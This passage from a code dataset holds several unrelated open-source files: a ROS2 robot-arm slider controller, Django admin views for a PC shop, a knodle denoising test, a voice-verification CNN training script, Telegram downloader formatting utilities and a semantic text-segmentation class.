files_model.add(Flatten())\r\n","repo_name":"dang-mai/deep_learning_SourceFinder","sub_path":"DL_SourceFinder_v0/SourceFinder_v0.py","file_name":"SourceFinder_v0.py","file_ext":"py","file_size_in_byte":5593,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"18058998902","text":"#!/usr/bin/env python3\nimport rclpy\nfrom rclpy.node import Node\nfrom sensor_msgs.msg import JointState\nfrom trajectory_msgs.msg import JointTrajectory, JointTrajectoryPoint\n\n\nclass SliderControl(Node):\n\n def __init__(self):\n super().__init__(\"slider_control\")\n self.arm_pub_ = self.create_publisher(JointTrajectory, \"arm_controller/joint_trajectory\", 10)\n self.gripper_pub_ = self.create_publisher(JointTrajectory, \"gripper_controller/joint_trajectory\", 10)\n self.sub_ = self.create_subscription(JointState, \"joint_commands\", self.sliderCallback, 10)\n self.get_logger().info(\"Slider Control Node 
started\")\n\n def sliderCallback(self, msg):\n arm_controller = JointTrajectory()\n gripper_controller = JointTrajectory()\n arm_controller.joint_names = [\"joint_1\", \"joint_2\", \"joint_3\"]\n gripper_controller.joint_names = [\"joint_4\"]\n\n arm_goal = JointTrajectoryPoint()\n gripper_goal = JointTrajectoryPoint()\n arm_goal.positions = msg.position[:3]\n gripper_goal.positions = [msg.position[3]]\n\n arm_controller.points.append(arm_goal)\n gripper_controller.points.append(gripper_goal)\n\n self.arm_pub_.publish(arm_controller)\n self.gripper_pub_.publish(gripper_controller)\n\n\ndef main():\n rclpy.init()\n\n simple_publisher = SliderControl()\n rclpy.spin(simple_publisher)\n \n simple_publisher.destroy_node()\n rclpy.shutdown()\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"AntoBrandi/Arduino-Bot","sub_path":"arduinobot_ws/src/arduinobot_controller/arduinobot_controller/slider_control.py","file_name":"slider_control.py","file_ext":"py","file_size_in_byte":1490,"program_lang":"python","lang":"en","doc_type":"code","stars":18,"dataset":"github-code","pt":"53"} +{"seq_id":"33736875735","text":"from django.shortcuts import render, redirect, reverse, get_object_or_404\nfrom django.contrib import messages\nfrom django.contrib.auth.decorators import login_required\nfrom .models import Brand, KeyFeatures, Feature, Specification, Spec, Category\nfrom .forms import (\n BrandForm, KeyFeaturesForm, FeatureForm,\n SpecificationForm, SpecForm, CategoryForm)\n\n\n# Categories ******************************************************************\n\n\ndef all_categories(request):\n \"\"\" A view to show all categories \"\"\"\n\n categories = Category.objects.all()\n\n context = {\n 'categories': categories,\n }\n\n return render(request, 'categories/categories.html', context)\n\n\ndef category_detail(request, category_id):\n \"\"\" A view to show category details \"\"\"\n\n category = get_object_or_404(Category, pk=category_id)\n\n context = {\n 'category': category,\n }\n\n return render(request, 'categories/category_detail.html', context)\n\n\n@login_required\ndef add_category(request):\n \"\"\" Add a category to the categories \"\"\"\n\n if not request.user.is_superuser:\n messages.error(request, 'Sorry, only store owners can do that.')\n return redirect(reverse('home'))\n\n if request.method == 'POST':\n form = CategoryForm(request.POST, request.FILES)\n if form.is_valid():\n category = form.save()\n messages.success(request, 'Successfully added category!')\n return redirect(reverse('category_detail', args=[category.id]))\n else:\n messages.error(request, 'Failed to add category. Please ensure the form is valid.')\n else:\n form = CategoryForm()\n\n template = 'categories/add_category.html'\n context = {\n 'form': form,\n }\n\n return render(request, template, context)\n\n\n@login_required\ndef edit_category(request, category_id):\n \"\"\" View to edit category \"\"\"\n\n if not request.user.is_superuser:\n messages.error(request, 'Sorry, only store owners can do that.')\n return redirect(reverse('home'))\n\n category = get_object_or_404(Category, pk=category_id)\n if request.method == 'POST':\n form = CategoryForm(request.POST, request.FILES, instance=category)\n if form.is_valid():\n form.save()\n messages.success(request, 'Successfully updated category!')\n return redirect(reverse('category_detail', args=[category.id]))\n else:\n messages.error(request,'Failed to update category. 
Please ensure the form is valid.')\n else:\n form = CategoryForm(instance=category)\n messages.info(request, f'You are editing {category.name}')\n\n template = 'categories/edit_category.html'\n context = {\n 'form': form,\n 'category': category,\n }\n\n return render(request, template, context)\n\n\n@login_required\ndef delete_category(request, category_id):\n \"\"\" Delete a category from the categories \"\"\"\n\n if not request.user.is_superuser:\n messages.error(request, 'Sorry, only store owners can do that.')\n return redirect(reverse('home'))\n\n category = get_object_or_404(Category, pk=category_id)\n category.delete()\n messages.success(request, 'Category deleted!')\n return redirect(reverse('categories'))\n\n\n# Brands *********************************************************************\n\n\ndef all_brands(request):\n \"\"\" A view to show all brands \"\"\"\n\n brands = Brand.objects.all()\n\n context = {\n 'brands': brands,\n }\n\n return render(request, 'setup/brands.html', context)\n\n\ndef brand_detail(request, brand_id):\n \"\"\" A view to show brand details \"\"\"\n\n brand = get_object_or_404(Brand, pk=brand_id)\n\n context = {\n 'brand': brand,\n }\n\n return render(request, 'setup/brand_detail.html', context)\n\n\n@login_required\ndef add_brand(request):\n \"\"\" Add a brand to the brands \"\"\"\n\n if not request.user.is_superuser:\n messages.error(request, 'Sorry, only store owners can do that.')\n return redirect(reverse('home'))\n\n if request.method == 'POST':\n form = BrandForm(request.POST, request.FILES)\n if form.is_valid():\n brand = form.save()\n messages.success(request, 'Successfully added brand!')\n return redirect(reverse('brand_detail', args=[brand.id]))\n else:\n messages.error(request,'Failed to add brand. Please ensure the form is valid.')\n else:\n form = BrandForm()\n\n template = 'setup/add_brand.html'\n context = {\n 'form': form,\n }\n\n return render(request, template, context)\n\n\n@login_required\ndef edit_brand(request, brand_id):\n \"\"\" View to edit brand \"\"\"\n\n if not request.user.is_superuser:\n messages.error(request, 'Sorry, only store owners can do that.')\n return redirect(reverse('home'))\n\n brand = get_object_or_404(Brand, pk=brand_id)\n if request.method == 'POST':\n form = BrandForm(request.POST, request.FILES, instance=brand)\n if form.is_valid():\n form.save()\n messages.success(request, 'Successfully updated brand!')\n return redirect(reverse('brand_detail', args=[brand.id]))\n else:\n messages.error(request,'Failed to update brand. 
Please ensure the form is valid.')\n else:\n form = BrandForm(instance=brand)\n messages.info(request, f'You are editing {brand.name}')\n\n template = 'setup/edit_brand.html'\n context = {\n 'form': form,\n 'brand': brand,\n }\n\n return render(request, template, context)\n\n\n@login_required\ndef delete_brand(request, brand_id):\n \"\"\" Delete a brand from the brands \"\"\"\n\n if not request.user.is_superuser:\n messages.error(request, 'Sorry, only store owners can do that.')\n return redirect(reverse('home'))\n\n brand = get_object_or_404(Brand, pk=brand_id)\n brand.delete()\n messages.success(request, 'Brand deleted!')\n return redirect(reverse('brands'))\n\n\n# Key Features ****************************************************************\n\n\ndef all_keyfeatures(request):\n \"\"\" A view to show all keyfeatures \"\"\"\n\n keyfeatures = KeyFeatures.objects.all()\n\n context = {\n 'keyfeatures': keyfeatures,\n }\n\n return render(request, 'keyfeatures/keyfeatures.html', context)\n\n\ndef keyfeatures_detail(request, keyfeatures_id):\n \"\"\" A view to show keyfeature detail \"\"\"\n\n keyfeatures = get_object_or_404(KeyFeatures, pk=keyfeatures_id)\n\n context = {\n 'keyfeatures': keyfeatures,\n }\n\n return render(request, 'keyfeatures/keyfeatures_detail.html', context)\n\n\n@login_required\ndef add_keyfeatures(request):\n \"\"\" Add a keyfeature to the keyfeatures \"\"\"\n\n if not request.user.is_superuser:\n messages.error(request, 'Sorry, only store owners can do that.')\n return redirect(reverse('home'))\n\n if request.method == 'POST':\n form = KeyFeaturesForm(request.POST, request.FILES)\n if form.is_valid():\n keyfeatures = form.save()\n messages.success(request, 'Successfully added key features!')\n return redirect(reverse('keyfeatures'))\n else:\n messages.error(request, 'Failed to add key feature. Please ensure the form is valid.')\n else:\n form = KeyFeaturesForm()\n\n template = 'keyfeatures/add_keyfeatures.html'\n context = {\n 'form': form,\n }\n\n return render(request, template, context)\n\n\n@login_required\ndef edit_keyfeatures(request, keyfeatures_id):\n \"\"\" View to edit kefeatures \"\"\"\n\n if not request.user.is_superuser:\n messages.error(request, 'Sorry, only store owners can do that.')\n return redirect(reverse('home'))\n\n keyfeatures = get_object_or_404(KeyFeatures, pk=keyfeatures_id)\n if request.method == 'POST':\n form = KeyFeaturesForm(request.POST, request.FILES, instance=keyfeatures)\n if form.is_valid():\n form.save()\n messages.success(request, 'Successfully updated key feature!')\n return redirect(reverse('keyfeatures_detail', args=[keyfeatures.id]))\n else:\n messages.error(request, 'Failed to update key feature. 
Please ensure the form is valid.')\n    else:\n        form = KeyFeaturesForm(instance=keyfeatures)\n        messages.info(request, f'You are editing {keyfeatures.name}')\n\n    template = 'keyfeatures/edit_keyfeatures.html'\n    context = {\n        'form': form,\n        'keyfeatures': keyfeatures,\n    }\n\n    return render(request, template, context)\n\n\n@login_required\ndef delete_keyfeatures(request, keyfeatures_id):\n    \"\"\" Delete a key feature from the key features \"\"\"\n\n    if not request.user.is_superuser:\n        messages.error(request, 'Sorry, only store owners can do that.')\n        return redirect(reverse('home'))\n\n    keyfeatures = get_object_or_404(KeyFeatures, pk=keyfeatures_id)\n    keyfeatures.delete()\n    messages.success(request, 'Keyfeature deleted!')\n    return redirect(reverse('keyfeatures'))\n\n\n# Features ********************************************************************\n\n\ndef all_features(request):\n    \"\"\" A view to show all features \"\"\"\n\n    features = Feature.objects.all()\n\n    context = {\n        'features': features,\n    }\n\n    return render(request, 'features/features.html', context)\n\n\n@login_required\ndef add_feature(request):\n    \"\"\" Add a feature to the features \"\"\"\n\n    if not request.user.is_superuser:\n        messages.error(request, 'Sorry, only store owners can do that.')\n        return redirect(reverse('home'))\n\n    if request.method == 'POST':\n        form = FeatureForm(request.POST, request.FILES)\n        if form.is_valid():\n            feature = form.save()\n            messages.success(request, 'Successfully added feature!')\n            return redirect(reverse('features'))\n        else:\n            messages.error(request, 'Failed to add feature. Please ensure the form is valid.')\n    else:\n        form = FeatureForm()\n\n    template = 'features/add_feature.html'\n    context = {\n        'form': form,\n    }\n\n    return render(request, template, context)\n\n\n@login_required\ndef delete_feature(request, feature_id):\n    \"\"\" Delete a feature from the features \"\"\"\n    if not request.user.is_superuser:\n        messages.error(request, 'Sorry, only store owners can do that.')\n        return redirect(reverse('home'))\n\n    feature = get_object_or_404(Feature, pk=feature_id)\n    feature.delete()\n    messages.success(request, 'Feature deleted!')\n    return redirect(reverse('features'))\n\n\n# Specifications **************************************************************\n\n\ndef all_specifications(request):\n    \"\"\" A view to show all specifications \"\"\"\n\n    specifications = Specification.objects.all()\n\n    context = {\n        'specifications': specifications,\n    }\n\n    return render(request, 'specifications/specifications.html', context)\n\n\ndef specification_detail(request, specification_id):\n    \"\"\" A view to show specification detail \"\"\"\n\n    specification = get_object_or_404(Specification, pk=specification_id)\n\n    context = {\n        'specification': specification,\n    }\n\n    return render(request, 'specifications/specification_detail.html', context)\n\n\n@login_required\ndef add_specification(request):\n    \"\"\" Add a specification to the specifications \"\"\"\n\n    if not request.user.is_superuser:\n        messages.error(request, 'Sorry, only store owners can do that.')\n        return redirect(reverse('home'))\n\n    if request.method == 'POST':\n        form = SpecificationForm(request.POST, request.FILES)\n        if form.is_valid():\n            specification = form.save()\n            messages.success(request, 'Successfully added specification!')\n            return redirect(reverse('specifications'))\n        else:\n            messages.error(request, 'Failed to add specification. 
Please ensure the form is valid.')\n    else:\n        form = SpecificationForm()\n\n    template = 'specifications/add_specification.html'\n    context = {\n        'form': form,\n    }\n\n    return render(request, template, context)\n\n\n@login_required\ndef edit_specification(request, specification_id):\n    \"\"\" View to edit specification \"\"\"\n\n    if not request.user.is_superuser:\n        messages.error(request, 'Sorry, only store owners can do that.')\n        return redirect(reverse('home'))\n\n    specification = get_object_or_404(Specification, pk=specification_id)\n    if request.method == 'POST':\n        form = SpecificationForm(request.POST, request.FILES, instance=specification)\n        if form.is_valid():\n            form.save()\n            messages.success(request, 'Successfully updated specification!')\n            return redirect(reverse('specification_detail', args=[specification.id]))\n        else:\n            messages.error(request, 'Failed to update specification. Please ensure the form is valid.')\n    else:\n        form = SpecificationForm(instance=specification)\n        messages.info(request, f'You are editing {specification.name}')\n\n    template = 'specifications/edit_specification.html'\n    context = {\n        'form': form,\n        'specification': specification,\n    }\n\n    return render(request, template, context)\n\n\n@login_required\ndef delete_specification(request, specification_id):\n    \"\"\" Delete a specification\"\"\"\n\n    if not request.user.is_superuser:\n        messages.error(request, 'Sorry, only store owners can do that.')\n        return redirect(reverse('home'))\n\n    specification = get_object_or_404(Specification, pk=specification_id)\n    specification.delete()\n    messages.success(request, 'Specification deleted!')\n    return redirect(reverse('specifications'))\n\n\n# Specs *********************************************************************\n\n\ndef all_specs(request):\n    \"\"\" A view to show all specs \"\"\"\n\n    specs = Spec.objects.all()\n\n    context = {\n        'specs': specs,\n    }\n\n    return render(request, 'specs/specs.html', context)\n\n\n@login_required\ndef add_spec(request):\n    \"\"\" Add a spec to the specs \"\"\"\n\n    if not request.user.is_superuser:\n        messages.error(request, 'Sorry, only store owners can do that.')\n        return redirect(reverse('home'))\n\n    if request.method == 'POST':\n        form = SpecForm(request.POST, request.FILES)\n        if form.is_valid():\n            spec = form.save()\n            messages.success(request, 'Successfully added spec!')\n            return redirect(reverse('specs'))\n        else:\n            messages.error(request, 'Failed to add spec. 
Please ensure the form is valid.')\n else:\n form = SpecForm()\n\n template = 'specs/add_spec.html'\n context = {\n 'form': form,\n }\n\n return render(request, template, context)\n\n\n@login_required\ndef delete_spec(request, spec_id):\n \"\"\" Delete a spec from the specs \"\"\"\n\n if not request.user.is_superuser:\n messages.error(request, 'Sorry, only store owners can do that.')\n return redirect(reverse('home'))\n\n spec = get_object_or_404(Spec, pk=spec_id)\n spec.delete()\n messages.success(request, 'Spec deleted!')\n return redirect(reverse('specs'))\n","repo_name":"IvanTepes/django-e-commerce-pc-shop","sub_path":"setup/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":15002,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"75328598888","text":"import pytest\nimport numpy as np\nfrom numpy.testing import assert_array_equal\n\nfrom knodle.trainer.utils.denoise import activate_neighbors\n\n\ndef test_denoise_knn():\n ## case 1 ##\n test_array = np.array([[0, 1], [1, 0]])\n right_result = np.array([[1, 1], [1, 1]])\n indices = np.array([[0, 1], [1, 0]])\n\n denoised_z = activate_neighbors(test_array, indices)\n assert_array_equal(denoised_z, right_result)\n\n # make sure all old matches persist and have same match values (currently always 1)\n assert denoised_z[test_array == 1].sum() == test_array[test_array == 1].sum()\n\n ## case 2 ##\n test_array = np.diag(np.ones((3,)))\n indices = np.array([\n np.array([0, 1, 2]),\n np.array([0]),\n np.array([1])\n ])\n\n right_result = np.diag(np.ones((3,)))\n right_result[0, :] = 1\n right_result[1, 0] = 1\n right_result[2, 1] = 1\n\n denoised_z = activate_neighbors(test_array, indices)\n assert_array_equal(denoised_z, right_result)\n assert denoised_z[test_array == 1].sum() == test_array[test_array == 1].sum()\n\n ## case 3 ##\n test_array = np.diag(np.ones((3,)))\n indices = np.array([\n np.array([0, 1]),\n np.array([1, 2]),\n np.array([0, 2])\n ])\n\n right_result = np.ones((3, 3))\n right_result[0, 2] = 0\n right_result[1, 0] = 0\n right_result[2, 1] = 0\n\n denoised_z = activate_neighbors(test_array, indices)\n assert_array_equal(denoised_z, right_result)\n assert denoised_z[test_array == 1].sum() == test_array[test_array == 1].sum()\n","repo_name":"knodle/knodle","sub_path":"tests/trainer/utils/test_denoise.py","file_name":"test_denoise.py","file_ext":"py","file_size_in_byte":1541,"program_lang":"python","lang":"en","doc_type":"code","stars":103,"dataset":"github-code","pt":"53"} +{"seq_id":"8758221748","text":"import numpy as np\nimport tensorflow as tf\nimport voicecnn\n\nif __name__ == '__main__':\n # test whether this environment support GPU training\n print(tf.config.list_physical_devices('GPU'))\n # create model\n model = voicecnn.VoiceVerificationCNN((32, 86, 1), 4)\n\n dataset_file_path = 'dataset.npy'\n labels_file_path = 'labels.npy'\n\n # load dataset\n dataset = np.load(dataset_file_path,allow_pickle=True)\n dataset = tf.convert_to_tensor(dataset)\n print('dataset ', np.shape(dataset))\n\n # load labels and convert into one-hot encoded labels\n labels = np.load(labels_file_path,allow_pickle=True)\n # Convert the string labels into integer labels\n unique_labels = list(set(labels))\n label_to_int = {label: i for i, label in enumerate(unique_labels)}\n int_labels = [label_to_int[label] for label in labels]\n # Convert the integer labels into one-hot encoded labels\n one_hot_labels = tf.keras.utils.to_categorical(int_labels, len(unique_labels))\n 
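# Worked example of the two steps above (hypothetical speaker names, and\n    # assuming 'alice' happens to map to 0, since set() ordering is arbitrary):\n    #   labels     = ['alice', 'bob', 'alice']\n    #   int_labels = [0, 1, 0]\n    #   one_hot_labels -> [[1., 0.], [0., 1.], [1., 0.]]  # shape (3, 2)\n    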
print('labels ', np.shape(one_hot_labels))\n # np.set_printoptions(threshold=np.inf)\n print(one_hot_labels)\n\n model.compile(optimizer=tf.optimizers.SGD(learning_rate=0.003),\n loss='categorical_crossentropy',\n metrics=['accuracy'])\n \n model.fit(x=dataset,y=one_hot_labels,epochs=500, batch_size=20)\n\n # save the model\n # model.save_weights('../model/model_20230209_0121.h5')\n tf.keras.models.save_model(model=model, filepath='../model/model_20230602_1208.h5')\n","repo_name":"woodecode/voiceprint_cnn","sub_path":"src/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":1510,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"5915182203","text":"\"\"\"util format\"\"\"\n\nimport math\nimport os\nimport re\nimport unicodedata\nfrom datetime import datetime\nfrom typing import Optional\n\n\ndef format_byte(size: float, dot=2):\n \"\"\"format byte\"\"\"\n\n # pylint: disable = R0912\n if 0 <= size < 1:\n human_size = str(round(size / 0.125, dot)) + \"b\"\n elif 1 <= size < 1024:\n human_size = str(round(size, dot)) + \"B\"\n elif math.pow(1024, 1) <= size < math.pow(1024, 2):\n human_size = str(round(size / math.pow(1024, 1), dot)) + \"KB\"\n elif math.pow(1024, 2) <= size < math.pow(1024, 3):\n human_size = str(round(size / math.pow(1024, 2), dot)) + \"MB\"\n elif math.pow(1024, 3) <= size < math.pow(1024, 4):\n human_size = str(round(size / math.pow(1024, 3), dot)) + \"GB\"\n elif math.pow(1024, 4) <= size < math.pow(1024, 5):\n human_size = str(round(size / math.pow(1024, 4), dot)) + \"TB\"\n elif math.pow(1024, 5) <= size < math.pow(1024, 6):\n human_size = str(round(size / math.pow(1024, 5), dot)) + \"PB\"\n elif math.pow(1024, 6) <= size < math.pow(1024, 7):\n human_size = str(round(size / math.pow(1024, 6), dot)) + \"EB\"\n elif math.pow(1024, 7) <= size < math.pow(1024, 8):\n human_size = str(round(size / math.pow(1024, 7), dot)) + \"ZB\"\n elif math.pow(1024, 8) <= size < math.pow(1024, 9):\n human_size = str(round(size / math.pow(1024, 8), dot)) + \"YB\"\n elif math.pow(1024, 9) <= size < math.pow(1024, 10):\n human_size = str(round(size / math.pow(1024, 9), dot)) + \"BB\"\n elif math.pow(1024, 10) <= size < math.pow(1024, 11):\n human_size = str(round(size / math.pow(1024, 10), dot)) + \"NB\"\n elif math.pow(1024, 11) <= size < math.pow(1024, 12):\n human_size = str(round(size / math.pow(1024, 11), dot)) + \"DB\"\n elif math.pow(1024, 12) <= size:\n human_size = str(round(size / math.pow(1024, 12), dot)) + \"CB\"\n else:\n raise ValueError(\n f'format_byte() takes number than or equal to 0, \" \\\n \" but less than 0 given. 
{size}'\n )\n return human_size\n\n\nclass SearchDateTimeResult:\n \"\"\"search result for datetime\"\"\"\n\n def __init__(\n self,\n value: str = \"\",\n right_str: str = \"\",\n left_str: str = \"\",\n match: bool = False,\n ):\n self.value = value\n self.right_str = right_str\n self.left_str = left_str\n self.match = match\n\n\ndef get_date_time(text: str, fmt: str) -> SearchDateTimeResult:\n \"\"\"Get first of date time,and split two part\n\n Parameters\n ----------\n text: str\n ready to search text\n\n Returns\n -------\n SearchDateTimeResult\n\n \"\"\"\n res = SearchDateTimeResult()\n search_text = re.sub(r\"\\s+\", \" \", text)\n regex_list = [\n # 2013.8.15 22:46:21\n r\"\\d{4}[-/\\.]{1}\\d{1,2}[-/\\.]{1}\\d{1,2}[ ]{1,}\\d{1,2}:\\d{1,2}:\\d{1,2}\",\n # \"2013.8.15 22:46\"\n r\"\\d{4}[-/\\.]{1}\\d{1,2}[-/\\.]{1}\\d{1,2}[ ]{1,}\\d{1,2}:\\d{1,2}\",\n # \"2014.5.11\"\n r\"\\d{4}[-/\\.]{1}\\d{1,2}[-/\\.]{1}\\d{1,2}\",\n # \"2014.5\"\n r\"\\d{4}[-/\\.]{1}\\d{1,2}\",\n ]\n\n format_list = [\n \"%Y-%m-%d %H:%M:%S\",\n \"%Y-%m-%d %H:%M\",\n \"%Y-%m-%d\",\n \"%Y-%m\",\n ]\n\n for i, value in enumerate(regex_list):\n search_res = re.search(value, search_text)\n if search_res:\n time_str = search_res.group(0)\n try:\n res.value = datetime.strptime(\n time_str.replace(\"/\", \"-\").replace(\".\", \"-\").strip(), format_list[i]\n ).strftime(fmt)\n except Exception:\n break\n if search_res.start() != 0:\n res.left_str = search_text[0 : search_res.start()]\n if search_res.end() + 1 <= len(search_text):\n res.right_str = search_text[search_res.end() :]\n res.match = True\n return res\n\n return res\n\n\ndef replace_date_time(text: str, fmt: str = \"%Y-%m-%d %H:%M:%S\") -> str:\n \"\"\"Replace text all datetime to the right fmt\n\n Parameters\n ----------\n text: str\n ready to search text\n\n fmt: str\n the right datetime format\n\n Returns\n -------\n str\n The right format datetime str\n\n \"\"\"\n\n if not text:\n return text\n res_str = \"\"\n res = get_date_time(text, fmt)\n if not res.match:\n return text\n if res.left_str:\n res_str += replace_date_time(res.left_str)\n res_str += res.value\n if res.right_str:\n res_str += replace_date_time(res.right_str)\n\n return res_str\n\n\n_BYTE_UNIT = [\"B\", \"KB\", \"MB\", \"GB\", \"TB\"]\n\n\ndef get_byte_from_str(byte_str: str) -> Optional[int]:\n \"\"\"Get byte from str\n\n Parameters\n ----------\n byte_str: str\n Include byte str\n\n Returns\n -------\n int\n Byte\n \"\"\"\n search_res = re.match(r\"(\\d{1,})(B|KB|MB|GB|TB)\", byte_str)\n if search_res:\n unit_str = search_res.group(2)\n unit: int = 1\n for it in _BYTE_UNIT:\n if it == unit_str:\n break\n unit *= 1024\n\n return int(search_res.group(1)) * unit\n\n return None\n\n\ndef truncate_filename(path: str, limit: int = 230) -> str:\n \"\"\"Truncate filename to the max len.\n\n Parameters\n ----------\n path: str\n File name path\n\n limit: int\n limit file name len(utf-8 byte)\n\n Returns\n -------\n str\n if file name len more than limit then return truncate filename or return filename\n\n \"\"\"\n p, f = os.path.split(os.path.normpath(path))\n f, e = os.path.splitext(f)\n f_max = limit - len(e.encode(\"utf-8\"))\n f = unicodedata.normalize(\"NFC\", f)\n f_trunc = f.encode()[:f_max].decode(\"utf-8\", errors=\"ignore\")\n return os.path.join(p, f_trunc + e)\n\n\ndef extract_info_from_link(link: str):\n \"\"\"Extract info from link\"\"\"\n if link in (\"me\", \"self\"):\n return link, None\n\n channel_match = re.match(r\"(?:https?://)?t\\.me/c/(\\w+)(?:.*/(\\d+)|/(\\d+))?\", link)\n if 
channel_match:\n        chat_id = f\"-100{channel_match.group(1)}\"\n        message_id = int(channel_match.group(2)) if channel_match.group(2) else None\n        return int(chat_id), message_id\n\n    username_match = re.match(r\"(?:https?://)?t\\.me/(\\w+)(?:.*/(\\d+)|/(\\d+))?\", link)\n    if username_match:\n        username = username_match.group(1)\n        message_id = int(username_match.group(2)) if username_match.group(2) else None\n        return username, message_id\n\n    return None, None\n\n\ndef validate_title(title: str) -> str:\n    \"\"\"Replace characters that are invalid in file names with underscores\n\n    Parameters\n    ----------\n    title: str\n        Chat title\n\n    \"\"\"\n\n    r_str = r\"[/\\\\:*?\\\"<>|\\n]\"  # '/ \\ : * ? \" < > |'\n    new_title = re.sub(r_str, \"_\", title)\n    return new_title\n\n\ndef create_progress_bar(progress, total_bars=10):\n    \"\"\"\n    example\n    progress = 50\n    progress_bar = create_progress_bar(progress)\n    print(f'Progress: [{progress_bar}] ({progress}%)')\n    \"\"\"\n    completed_bars = int(progress * total_bars / 100)\n    remaining_bars = total_bars - completed_bars\n    progress_bar = \"█\" * completed_bars + \"░\" * remaining_bars\n    return progress_bar\n","repo_name":"tangyoha/telegram_media_downloader","sub_path":"utils/format.py","file_name":"format.py","file_ext":"py","file_size_in_byte":7121,"program_lang":"python","lang":"en","doc_type":"code","stars":1043,"dataset":"github-code","pt":"53"}
{"seq_id":"69948336810","text":"from functools import lru_cache, reduce\nfrom logging import getLogger\n\nimport numpy as np\nfrom sentence_transformers import SentenceTransformer\nfrom sklearn.metrics.pairwise import cosine_similarity\n\nfrom agenda_maker.common.release_gpu_memory import release_gpu_memory\nfrom agenda_maker.model.base_model import BaseModel\n\nlogger = getLogger(__name__)\n\n__all__ = [\"SemanticTextSegmentation\"]\n\n\nclass SemanticTextSegmentation(BaseModel):\n\n    \"\"\"\n    Vectorize sentences with SentenceTransformer, compute their cosine\n    similarity, and merge sentences whose similarity is at or above the threshold.\n    \"\"\"\n\n    def set_params(self) -> None:\n        # parameter of semantic segmentation\n        self.threshold = self.config_manager.config.model.segmentation.semantic_segmentation.threshold\n        self.th_segment_num = self.config_manager.config.model.segmentation.th_segment_num\n        self.max_segment_text = self.config_manager.config.model.segmentation.max_segment_text\n        self.min_segment_text = self.config_manager.config.model.segmentation.min_segment_text\n        self.model_type = self.config_manager.config.model.segmentation.semantic_segmentation.model_type\n\n    def build_model(self) -> None:\n        self.set_params()\n        self.load_sentence_transformer()\n\n    def get_result(self, list_text: list[str]) -> list:\n        self.build_model()\n        semantic_segmentation = self.semantic_segmentation(list_text)\n        if len(list_text) >= self.th_segment_num:\n            semantic_segmentation = self.merge_min_text(semantic_segmentation)\n        release_gpu_memory(gpu_task=self.model)\n        return semantic_segmentation\n\n    @lru_cache\n    def load_sentence_transformer(self) -> None:\n        self.model = SentenceTransformer(self.model_type)\n\n    def semantic_segmentation(self, list_text: list[str]) -> list[str]:\n        th_max = self.max_segment_text\n        th_sim = self.threshold\n\n        list_result = self._get_sim_len(list_text)\n\n        while True:\n            if len(list_text) <= self.th_segment_num:\n                break\n            is_continue = any([(value[0] >= th_sim and value[1] <= th_max) for value in list_result])\n\n            if is_continue:\n                list_text = self.combine_similar_strings(\n                    list_text=list_text, list_result=list_result, 
th_sim=th_sim, th_max=th_max\n )\n list_result = self._get_sim_len(list_text)\n else:\n break\n return list_text\n\n def merge_min_text(self, list_text: list[list[str]]) -> list[str]:\n \"\"\"\n 文字列のリストを指定された条件に従って結合します。\n\n Args:\n list_text (list): 結合する文字列が格納されたリスト。\n th_min (int): チャンクとして結合するための最小文字数。\n th_max (int): チャンクとして結合後の最大文字数。\n\n Returns:\n list: 結合されたチャンクを格納したリスト。\n\n \"\"\"\n th_max = self.max_segment_text\n th_min = self.min_segment_text\n merged_text = []\n current_chunk = \"\"\n\n for i in range(len(list_text)):\n text = list_text[i]\n\n if len(current_chunk) + len(text) <= th_max:\n current_chunk += text\n else:\n if len(current_chunk) >= th_min:\n merged_text.append(current_chunk)\n current_chunk = text\n\n if len(current_chunk) >= th_min:\n merged_text.append(current_chunk)\n\n return merged_text\n\n def _get_sim_len(self, list_text: list[str]) -> list[list[float, float]]:\n list_result = []\n for i_text in range(len(list_text) - 1):\n list_result.append(\n [\n self._get_similarity(list_text[i_text], list_text[i_text + 1])[0][0],\n len(list_text[i_text]) + len(list_text[i_text + 1]),\n ]\n )\n return list_result\n\n def combine_similar_strings(self, list_text: list[str], list_result: list[list[float, float]], th_sim, th_max):\n \"\"\"\n 指定された条件を満たすように文字列リストを結合します。\n\n Args:\n list_text (list of str): 結合対象の文字列が含まれたリスト。\n list_result (list of list): 類似度と文字数の情報を含むリスト。\n 各要素は [similarity, sum_len] の形式で、list_text の隣接要素間の比較結果を示します。\n th_sim (float): 類似度の閾値。この閾値以上の類似度の場合、文字列を結合します。\n th_max (int): 文字数の最大制限。結合後の文字列の文字数がこの制限を超えないようにします。\n\n Returns:\n list of str: 条件を満たすように結合された文字列のリスト。リストの順番は変更されません。\n\n Example:\n list_text = [\n '文書1のテキスト',\n '文書2のテキスト',\n # ... 他の文書のテキスト ...\n ]\n list_result = [\n [0.8, 300], # 文書1と文書2の類似度と文字数\n [0.6, 250], # 文書2と文書3の類似度と文字数\n # ... 
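The `merge_min_text` method shown above implements a greedy, length-bounded concatenation. Here is the same idiom as a free function, with hypothetical default thresholds; note that, exactly like the original, a trailing chunk shorter than `th_min` is silently dropped.

def merge_chunks(texts: list, th_min: int = 50, th_max: int = 500) -> list:
    """Greedily join adjacent strings while each chunk stays within [th_min, th_max]."""
    merged, current = [], ""
    for text in texts:
        if len(current) + len(text) <= th_max:
            current += text
        else:
            if len(current) >= th_min:
                merged.append(current)
            current = text  # start a new chunk
    if len(current) >= th_min:
        merged.append(current)  # an undersized tail is discarded, as in the record
    return merged

assert merge_chunks(["a" * 40, "b" * 40, "c" * 490]) == ["a" * 40 + "b" * 40, "c" * 490]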
